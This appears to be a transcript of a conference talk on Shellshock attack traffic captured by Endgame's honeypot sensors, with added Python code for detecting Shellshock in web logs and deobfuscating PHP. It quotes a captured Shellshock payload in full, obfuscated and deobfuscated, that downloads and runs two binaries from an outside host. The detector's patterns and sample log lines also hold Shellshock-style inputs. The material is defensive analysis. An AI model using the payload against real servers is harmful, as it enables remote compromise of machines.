Global attack patterns to improve threat detection Curt Barnard, Software Implementation Engineer

Upload: endgameinc

Post on 15-Aug-2015



• Evolution of methods used in mass exploitation

• Adoption of these methods by malicious actors

• Adaptation of these actors to defensive measures

Key Takeaways

Crawlers, bots, and automated exploitation scripts crowd the internet

Up to 80% of all site traffic generated by bots [1]

Vulnerabilities in common, core programming libraries make juicy targets for malicious actors

[1] https://www.incapsula.com/blog/bot-traffic-report-2014.html

The internet is noisy

• Many malicious actors employ a “spray and pray” methodology

• Recent examples: Heartbleed, Shellshock, weak SSH credentials

• Commoditization of access is prevalent with non-targeted attacks

How do you get warnings of attacks?

Endgame employs a SensorNet of dummy web services to collect at-scale attack data

– Multiple VPS providers

– Multiple geographic regions

– Multiple OS configurations

– Centralized logging

When hackers talk, we listen

Shellshock Attack

We have observed a bad actor executing:

– An obfuscated PHP payload

– By leveraging a Shellshock vulnerability

– Via multiple client IP addresses

• Bash vulnerability related to variable assignment

• Can stuff it in HTTP headers

How is Shellshock formatted?

() { :;} ; <commands>

Shellshock prefix: () { :;} ;

Command sequence: <commands>

() { :;} ;echo;/usr/local/bin/php -r '$a = "http://x5d.su/x/AS1";''$b = "http://x5d.su/x/AS2";''$c = sys_get_temp_dir();''$d = "AS1";''$e = "AS2";''$f = "chmod 777";''$g = "file_put_contents";''$h = "system";''$i = "file_exists";''$j = "fopen";''$k = "uptime";''if ($i($c . "/$d"))''{''exit(1);''}else{''$h("$k");''$g("$c/$d", $j("$a", "r"));''$g("$c/$e", $j("$b", "r"));''$h("$f " . $c ."/$d");''$h("$f " . $c ."/$e");''$h($c . "/$d");''$h($c . "/$e");''}'
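The header-stuffing format above lends itself to a simple log-side detector. The following is an added example, not code from the talk or from Endgame's SensorNet: it scans combined-format access-log lines (the log format is an assumption; the sample lines are constructed, with RFC 5737 documentation addresses) for the "() {" function-definition prefix in the request line, Referer and User-Agent fields, extracts the command sequence that follows it, and groups source addresses by command, which is the "same payload from multiple client IPs" signal the slides describe.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set

# Combined log format (Apache/nginx default), assumed for this example:
#   ip ident user [timestamp] "request" status bytes "referer" "user-agent"
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The prefix from the slide, "() { :;} ; <commands>": vulnerable bash parses a
# variable whose value starts with "() {" as a function definition and then
# executes whatever follows the closing brace.  Whitespace is optional, so the
# pattern also catches variants such as "(){:;};".  Group "cmd" captures the
# command sequence for reporting.
SHELLSHOCK = re.compile(r"\(\)\s*\{[^}]*\}\s*;?\s*(?P<cmd>.*)$")

# Fields that CGI-style servers export as environment variables, which is why a
# payload placed in any of them reaches bash.
SCANNED_FIELDS = ("request", "referer", "agent")


@dataclass(frozen=True)
class Hit:
    ip: str        # client address the payload came from
    field: str     # which log field carried it
    command: str   # the command sequence after the function body


def find_shellshock(lines: Iterable[str]) -> List[Hit]:
    """Return one Hit per (line, field) that carries a Shellshock prefix."""
    hits: List[Hit] = []
    for line in lines:
        m = COMBINED_LOG.match(line.rstrip("\n"))
        if not m:
            continue  # not a combined-format line; skip it rather than abort the scan
        for field in SCANNED_FIELDS:
            s = SHELLSHOCK.search(m.group(field))
            if s:
                hits.append(Hit(m.group("ip"), field, s.group("cmd").strip()))
    return hits


def sources_per_command(hits: Iterable[Hit]) -> Dict[str, Set[str]]:
    """Group source IPs by the command they tried to run; one command arriving
    from several addresses is the spray-and-pray pattern the slides describe."""
    out: Dict[str, Set[str]] = {}
    for h in hits:
        out.setdefault(h.command, set()).add(h.ip)
    return out


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Aug/2015:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo; /usr/bin/uptime"',
    '198.51.100.9 - - [15/Aug/2015:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [15/Aug/2015:10:02:10 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :;}; /usr/bin/uptime" "curl/7.38.0"',
    '198.51.100.23 - - [15/Aug/2015:10:03:44 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "(){:;};/usr/bin/uptime"',
    "not a combined-format line at all",
]

if __name__ == "__main__":
    hits = find_shellshock(SAMPLE_LOG)
    for h in hits:
        print(f"{h.ip:15} {h.field:8} {h.command}")
    for cmd, ips in sources_per_command(hits).items():
        print(f"{len(ips)} source(s) for: {cmd}")
```

The prefix match is deliberately loose on whitespace because the bash parser is; matching only the exact string shown on the slide would miss the trivially reformatted variants that the slides say attackers moved to once defenders started pattern-matching.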

Obfuscated php code

The code is obfuscated to defeat pattern matchers, but the obfuscation is not very effective against a human reader

system("uptime");
file_put_contents("AS1", fopen("http://x5d.su/x/AS1", 'r'));
file_put_contents("AS2", fopen("http://x5d.su/x/AS2", 'r'));
system("chmod 777 AS1");
system("chmod 777 AS2");
system("AS1");
system("AS2");

Deobfuscated php code

This is the definition of spray and pray: the bad actor hopes to get something by a shotgun approach
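The obfuscation shown above relies on two PHP features: variable functions ($h("$k") calls whatever function name $h holds) and interpolation of $var inside double-quoted strings. The following is an added example, not code from the talk: a small Python pass that recovers the plain form from that pattern. It resolves variables assigned a string literal exactly once, leaves reassigned variables and non-literal assignments such as sys_get_temp_dir() alone, and folds adjacent literal concatenations. The sample input is constructed in the shape of the slide's payload, with an example.invalid host in place of the real download URLs.

```python
import re
from typing import Dict, Tuple

# A PHP assignment of a plain double-quoted literal, e.g. $h = "system";
# Strings containing escape sequences are deliberately not matched.
LITERAL_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"([^"\\]*)"\s*;\s*')
# A plain double-quoted string; used to split code into string / non-string segments.
STRING = re.compile(r'"[^"\\]*"')
# Two literals joined by PHP's "." operator, foldable into one literal.
CONCAT = re.compile(r'"([^"\\]*)"\s*\.\s*"([^"\\]*)"')


def collect_literals(code: str) -> Tuple[Dict[str, str], str]:
    """Return (name -> literal value, code with those assignments removed).
    Only variables assigned a literal exactly once are treated as constants;
    anything else (reassigned, or assigned a call result) stays untouched."""
    seen: Dict[str, int] = {}
    for name, _ in LITERAL_ASSIGN.findall(code):
        seen[name] = seen.get(name, 0) + 1
    consts = {n: v for n, v in LITERAL_ASSIGN.findall(code) if seen[n] == 1}
    stripped = LITERAL_ASSIGN.sub(lambda m: "" if m.group(1) in consts else m.group(0), code)
    return consts, stripped


def _resolve_code(segment: str, consts: Dict[str, str]) -> str:
    # $h(...) is a variable function call: substitute the function name it holds.
    segment = re.sub(
        r"\$(\w+)\s*\(",
        lambda m: f"{consts[m.group(1)]}("
        if m.group(1) in consts and re.fullmatch(r"\w+", consts[m.group(1)])
        else m.group(0),
        segment,
    )
    # A bare $var that holds a literal becomes the literal itself.
    return re.sub(
        r"\$(\w+)",
        lambda m: f'"{consts[m.group(1)]}"' if m.group(1) in consts else m.group(0),
        segment,
    )


def _resolve_string(segment: str, consts: Dict[str, str]) -> str:
    # PHP interpolates $var inside double quotes; inline the values we know.
    return re.sub(r"\$(\w+)", lambda m: consts.get(m.group(1), m.group(0)), segment)


def deobfuscate(code: str) -> str:
    """Recover plain PHP from the variable-function / interpolation pattern."""
    consts, rest = collect_literals(code)
    out, pos = [], 0
    for m in STRING.finditer(rest):
        out.append(_resolve_code(rest[pos:m.start()], consts))
        out.append(_resolve_string(m.group(0), consts))
        pos = m.end()
    out.append(_resolve_code(rest[pos:], consts))
    result = "".join(out)
    # Fold "a" . "b" into "ab" until nothing changes.
    while True:
        folded = CONCAT.sub(lambda m: f'"{m.group(1)}{m.group(2)}"', result)
        if folded == result:
            return result
        result = folded


# Constructed sample in the shape of the slide's payload; $c is a call, not a literal.
OBFUSCATED = (
    '$a = "http://example.invalid/x/AS1"; $c = sys_get_temp_dir(); $d = "AS1"; '
    '$f = "chmod 777"; $g = "file_put_contents"; $h = "system"; $i = "file_exists"; '
    '$j = "fopen"; $k = "uptime"; '
    'if ($i($c . "/$d")) { exit(1); } else { $h("$k"); $g("$c/$d", $j("$a", "r")); '
    '$h($f . " " . $c . "/$d"); $h($c . "/$d"); }'
)

if __name__ == "__main__":
    print(deobfuscate(OBFUSCATED))
```

Because $c is computed at run time, the pass leaves it symbolic and still produces readable calls such as system("chmod 777 " . $c . "/AS1"); this partial resolution is usually enough for an analyst, and it is the same transformation the slide's "deobfuscated" listing performs by hand.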

• Attackers are indiscriminately targeting web services with Shellshock

• They are using advanced techniques to prevent automated detection of TTPs

• The sophistication of these attacks has increased over time

• Several (likely compromised) sources are using the same infrastructure

The shocking summary

• Evolution of methods used in mass exploitation

• Adoption of these methods by malicious actors

• Adaptation of these actors to defensive measures

Key Takeaways

For more information contact: [email protected]